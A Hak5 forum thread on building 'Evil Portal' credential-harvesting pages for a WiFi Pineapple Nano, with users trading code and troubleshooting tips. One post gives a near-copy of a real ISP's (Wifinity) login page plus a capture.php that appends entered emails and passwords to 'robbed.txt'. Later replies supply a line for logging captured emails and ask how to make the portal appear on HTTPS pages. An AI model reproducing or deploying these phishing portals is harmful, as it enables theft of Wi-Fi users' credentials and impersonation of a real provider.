Landing Page / Evil Portal - Capture data

[cyberbitz]

Ok, Thanks MarcSThe1st. I will hold off on using that. I have created a startup script to enable the landing page which works. However, getting it to work is tricky at times. I don't have much time today to look into it and I am not a pineapple expert so I am learning while digging into the code.

What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

[gibsta8570]

Hi.. This is my first post so go easy please..! I've never had to ask a question on a forum before because I've always found that another of the 7 billion peeps on the planet has already asked it and normally that question has been answered, helpfully, by a number of people. From there I've always been able to work out what it is I need to do in order to get what it is I'm doing working.

Not this time.. I've only had my Pineapple Nano just over a week but I've spent at least 2 to 3 hours a night trying to get my Evil Portal page working. So I'm swallowing my pride and asking for help. I'm also preparing for the ripping apart of my html / php / js code. I don't know php or javascript. What I've written is cobbled together from reading what other people have posted (and been helped to correct) and from videos. I will be doing the codecademy PHP and JavaScript courses over the next few weeks.

I don't think there is much wrong with my code. It's obviously not right or it would be working perfectly but it almost is..

I think my one issue is the location of the various files.

I have the following files saved in /root/portals/WifinityPortal

MyPortal.php - Produced by the module, not touched it.

WifinityPortal.ep - Produced by the module, not touched.

capture.php - Produced using sublime (with much help from jermzz's post). Code below.

index.php - Produced using sublime (with help taken from everywhere) then scp'd to the Nano to overwrite the original. Code below.

jquery-2.2.1.min.js

topleftlogo.png - Image file which is displayed fine.

robbed.txt - This file is located in /www permanently. Permissions are set to -rwxrw-rw-

All of the files become available in the /www directory when I activate the Portal using the Evil Portal module control page.

I've tried moving the robbed.txt and capture.php files around to eliminate the PineAP being funny about allowing access to them. As you'll be able to see in my code, I've tried different ways of submitting the credentials to the capture.php page. I've tried cutting out index.php and just having an html doc there, or pasting the contents of my index.html into the PineAP Configuration page's Landing Page box. I've tried everything I can think of, many many times.. I'm a little confused as to where jermzz and kingoddball has their splash.html document. When I used an index.html instead of index.php users where not authenticated.

Currently (with the files located as listed above), when a user connects (iOS) or tries to browse (any other device), the portal page is displayed. Entering email address and password causes the user's IP address to appear in the Evil Portal Authorised Clients list however the user is displayed the portal page a second time. Trying to load the original webpage that invoked the portal page doesn't work but loading a different page works. From what I've read, this is a known bug and is being working on.. The positive is that the page/module authorisation works, mostly. However, I still can't get the capture.php to write to the robbed.txt file.

If anyone can advise on their working solution of file names and locations.. And if anyone is able to scan down my code and spot any glaring errors.. I would be very very grateful. In return you get an almost working (carbon copy looking) version of Wifinity Inc.'s login page. Wifinity provide wifi based internet access in the accommodation block where I live; and also a rapidly increasing number of campuses, hotels, conference centres etc.. Although using the page for the purposes of stealing actual login credentials and thus allowing yourself free internet access would indeed be highly immoral! And there's some thing called the the law? Printed on vellum it is don't you know!

index.php

<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>

<!--
<!DOCTYPE html>
-->

<HTML>
    <HEAD>
        <title>Wifinity | Login Page</title>

<!-- LINK TO CSS FILE - COMMENTED OUT AND CONTENTS COPIED (TO BELOW) DUE TO EVIL PORTAL CSS ISSUE
        <link type="text/css" rel="stylesheet" href="wifinity.css"/>
-->
        <style type="text/css">
            body{
                background-color: #E4E3E2;
                font-family: Elido Light, Open Sans, Helvetica, Arial, Sans-serif;
            }
            #top_logo_banner{
            border: none;
            ;
            margin-right: -6px;
            margin-top: -10px;
            display: block;
            background-color: #FFFFFF;
            height: 72px;
            line-height: 100px;
            min-width: 100%;
            }
            #top_left_logo{
            width: 158px;
            height: 38px;
            margin-left: 10%;
            margin-top: 20px;
            }
            #center_login_box{
            background-color: #FFFFFF;
            border: 1px solid #CDCCCB;
            margin-top: 30px;
            margin-left: 20%;
            margin-right: 20%;
            height: 380px;
            }
            #invisible_center_box{
            border: none;
            width: 80%;
            height: 90%;
            margin-left: 10%;
            }
            .login_box_title{
            font-weight: normal;
            font-size: 1.6em;
            }
            label{
            font-weight: normal;
            font-size: 1em;
            }
            #emailaddress{
            height:40px;
            width: 98%;
            }
            #password{
            height:40px;
            width: 98%;
            }
            #submitbutton{
            background-color: #6FAE23;
            text-decoration: none;
            color: #FFFFFF;
            border: none;
            border-radius: 5px;
            height: 48px;
            width: 100%;
            font-size: 15px;
            text-transform: uppercase;
            padding: 0 20px;
            }
            #submitbutton:hover{
            background-color: #61991F;
            border-color: #61991F;
            text-decoration: none;
            }
            .grey_buttons{
            width:50%;
            }
            .footer_text{
            text-align: center;
            font-size: 1em;
            color: #888887;
            }
        </style>

        <script type="text/javascript">
            function redirect() {
                user_email = document.getElementById("emailaddress").value;
                user_password = document.getElementById("password").value;
                user_credentials = user_email + " - " + user_password;
                window.location = "/capture.php?user_credentials=" + user_credentials;
            } 
        </script>

<!-- ORIGINAL redirect() JAVASCRIPT FUNTION WITH TIMEOUT() FUNCTION - CREATED BY EVIL PORTAL MODULE
        <script type="text/javascript">
            function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} 
        </script>
-->

<!-- FUNCTIONS FOR CAPTURE AND REDIRECT MODIFIED FROM jermzz's HAK5 FORUM POST ON TRHEAD:
	https://forums.hak5.org/index.php?/topic/37546-evil-ap-portal-help-required-does-not-capture-data/

        <script type="text/javascript">
            function getUrlVars(){
                var vars = {};
                var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,
                function(m,key,value) {
                    vars[key] = value;
                });
                return vars;
            }
            var fvalsubmit = getUrlVars()["valsubmit"];
                if (fvalsubmit == 1) {
                    window.location = "$authtarget";
            }
            function capture_credentials() {
                user_email = document.getElementById("emailaddress").value;
                user_password = document.getElementById("password").value;
                user_credentials = user_email + " - " + user_password;
                window.location = "http://172.16.42.1/capture.php?user_credentials=" + user_credentials + "&redir=$authtarget&valsubmit=1";
            }
        </script>
-->

    </HEAD>
    <BODY>
        <div id="top_logo_banner">
            <img id="top_left_logo" src="topleftlogo.png"/>
        </div>
        <div id="center_login_box">
            <div id="invisible_center_box">
                <p class="login_box_title">Log in</p>
				<form id="credentialsform" method="POST" action="/captiveportal/index.php" onsubmit="redirect()">
					<input type="hidden" name="target" value="<?=$destination?>">

<!-- MY OPENING FORM TAG - USED WHEN CALLING capture_credentials() FUNCTION USING onclick OF BUTTON (NOT onsubmit OF FORM)
                <form id="credentialsform">
-->
                    <p>
                        <label for="emailaddress">Email Address</label>
                    </p>
                    <p>
                        <input type="text" name="emailaddress" id="emailaddress" placeholder="email@example.com" required>
                    </p>
                    <p>
                        <label for="password">Password</label>
                    </p>
                    <p>
                        <input type="password" name="password" id="password" placeholder="Password" required>
                    </p>
                    <p>
                    	<button type="submit" id="submitbutton">
                    		<b>LOG IN</b>
                    	</button>

<!-- MY ORIGINAL SUBMIT BUTTON FOR USE WITH capture_credentials() FUNCTION
                        <button type="button" id="submitbutton" onclick="capture_credentials()">
                            <b>LOG IN</b>
                        </button>
-->
                    </p>
                    <p>
                        <button class="grey_buttons">Refresh location</button><button class="grey_buttons">Reset password</button>
                    </p>
                </form>
            </div>
        </div>
		<div>
			<p class="footer_text">© Copyright 2016 Wifinity | All rights reserved</p>
		</div>
    </BODY>

<!-- BELOW IS ORIGINAL CONTENTS OF index.php PRODUCED BY EVIL PORTAL MODULE

<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
<HTML>
    <HEAD>
        <title>Evil Portal</title>
        <script type="text/javascript">
            function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} 
        </script>
    </HEAD>
    <BODY>
        <center>
            <h1>Evil Portal</h1>
            <p>This is the default Evil Portal page</p>
            <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()">
                <input type="hidden" name="target" value="<?=$destination?>">
                <button type="submit">Authorize</button>
            </form>
        </center>
    </BODY>
</HTML>
-->
</HTML>

capture.php

<?php

$user_credentials = $_GET["user_credentials"];
$redir = $_GET["redir"];

$file = fopen("robbed.txt", "a");
$fwrite($file, $user_credentials . "\n");
fclose($file);

echo '<script type="text/javascript">window.location = "/captiveportal/index.php"</script>';

?>

Apologies for being such a newb and rambling so much.. Any advice on how to get the credentials writing to the robbed.txt will be very thankfully received. Getting it working 100% will gladly wait until Evil Portal is updated.

[cheeto]

Just wondering, has anyone actually gotten EP (on the Nano) to work properly?

[Sebkinne]

Just wondering, has anyone actually gotten EP (on the Nano) to work properly?

Absolutely. I even used it for Pentest with hak5 in an exercise - worked well but has a couple of bugs still.

[cheeto]

THANKS SEB. I'm hoping for someone to post a working sample and build from there.

Glad to know that it's working though.

Cheers

Edited March 20, 2016 by cheeto

[gibsta8570]

I'm still scratching my head over trying to get the username and password written to the .txt file.

Cheers Seb, it's good to have confirmation that it can work and I'm not wasting my time... I will make it work!

[_OuTLaW_]

Cheeto, I planned on posting a sample for you later on today when I have a chance to plug my nano in. I currently have two portals working and capturing data as well as authorizing clients, as Seb pointed out it is still a little buggy. I was hoping to get one more portal working before I posted the results as I wanted to make sure the way I've found is easily replicated, since it took me a little bit to get both working properly. But to get a few more working examples out there for others to test, I'll go ahead and post it up for you to try in the modules forum.

[cheeto]

That makes two of us. Check out Jeremy's post above. His script does save the credentials but the client is not granted an Internet connection. (at least when I try it)

[cheeto]

_OuTLaW_, Please post at your earliest convenience. Many of us will learn from your script.

Many thanks in Advance!!!!!

[TheHobbyist_]

I've been able to get the landing page and evil portal both working (separately, of course, since they both do pretty much the same thing) with a custom page complete with php redirect once the user click the landing page submit button. I have a couple of questions regarding the use of these features:

• Is it possible on either one to set a cookie so that once a user has visited the landing page once, they will not be able to visit it again?
• Is there any way to get it to show up if the user's homepage is https (works fine on http pages)?

Any insight would be greatly appreciated.

[stilia.johny]

Hi.

I try your code just by adding it to the Configuration => Landing Page.

When I connect a device, the landing page is coming up but there is nothing inside? it looks empty!?

Is it how you did it?

Thanks in advance!

[Whistle Master]

With this specific example, the device has to connect to Twitter. It won't display anything otherwise.

[mercredi]

Hi everyone,

Thanks newbi3 for your tutorials, i see your last one

and it's work fine.

But when i've more than one client, it still appear the new data erase the old data on emails.log.

So we have always only one line with the last email from the last client.

I try with both Android and iOS, but look like isn't working with iOS emails.log appear empty. I try iOS 8.4.1 and 9.2.1.

If someone have an idea to fix this issue, please let us know.

Thank you,

[newbi3]

Sorry, for some reason I thought the default mode for the file_put_contents function was appending.

Use this line of code instead:

file_put_contents('/root/emails.log', "{$this->request->email}\n", FILE_APPEND);

[mercredi]

Hi,

Thank you! It's working fine now.

Do you now how to custom the Evil Portal with images?

[cheeto]

Hey guys,

I'm stuck trying to make a simple email and password portal.

KUDOS to Newbi3 on his video. I was able to make an email captive portal by following the steps in his tutorial.

Now however, I'm trying to modify the same portal so it can capture to fields, email and password.

When i fire this up and and enter an email and password, it will display my script. :(

this is my index.php

<?php

$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";

?>


<HTML>

    <HEAD>

        <title>Evil Portal</title>

        <script type="text/javascript">

            function redirect() { setTimeout(function(){window.location = "/captiveportal/index.php";},100);} 

        </script>

    </HEAD>


    <BODY>

        <center>

            <h1>Evil Portal</h1>

            <p>This is the default Evil Portal page</p>


            <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()">

                <input type="hidden" name="target" value="<?=$destination?>">

                <input type="text" name="email" placeholder="Please enter your email address" required>


                <input type="hidden" name="target" value="<?=$destination?>">

                <input type="password" name="password" placeholder="Please enter password" required>


                <button type="submit">Authorize</button>

            </form>


        </center>


    </BODY>


</HTML>

Also, I wasn't aware that https could be a factor for captive portals. When I enter my captive portal and go to

a https page it simply doesn't work. (I believe this has been discussed before)

Furthermore, When trying to access an https on my mk5, it also fails to shop the captive portal.

Is there a way around this?

thanks guys!!!

[M@s0n]

On 3/2/2016 at 11:49 AM, cyberbitz said:

Ok, Thanks MarcSThe1st. I will hold off on using that. I have created a startup script to enable the landing page which works. However, getting it to work is tricky at times. I don't have much time today to look into it and I am not a pineapple expert so I am learning while digging into the code.

What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

So I got everything working, But still having the same issue --> What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

Anybody come up with a fix for this ??